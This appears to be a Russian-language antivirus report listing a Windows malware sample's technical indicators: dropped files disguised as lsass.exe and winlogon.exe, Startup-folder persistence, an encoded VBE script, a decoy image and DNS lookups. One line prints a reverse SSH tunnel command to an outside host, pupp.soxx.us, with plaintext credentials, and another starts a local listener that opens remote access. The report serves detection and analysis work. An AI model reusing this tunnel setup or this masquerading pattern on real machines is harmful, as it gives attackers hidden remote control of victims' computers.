Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\ReaderUpdate.lnk
- 'C:\PefrLogs\lsass.exe' -ssh -R 9485:127.0.0.1:7908 pupp.soxx.us -l pupp -pw nina1341521nina
- 'C:\PefrLogs\winlogon.exe' -d -t -l -e0.0.0.0 -i127.0.0.1 -p7908 -a
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen C:\PefrLogs\pics.jpg
- '<SYSTEM32>\wscript.exe' "C:\PefrLogs\GoogleIndexer.vbe"
- %HOMEPATH%\Recent\pics.lnk
- C:\PefrLogs\GoogleIndexer.vbe
- <LS_APPDATA>\PUTTY.RND
- %HOMEPATH%\Recent\PefrLogs.lnk
- C:\PefrLogs\ReaderUpdate.lnk
- C:\PefrLogs\lsass.exe
- C:\PefrLogs\pics.jpg
- C:\PefrLogs\winlogon.exe
- 'pu##.soxx.us':22
- DNS ASK pu##.soxx.us
- ClassName: 'ShImgVw:CPreviewWnd' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'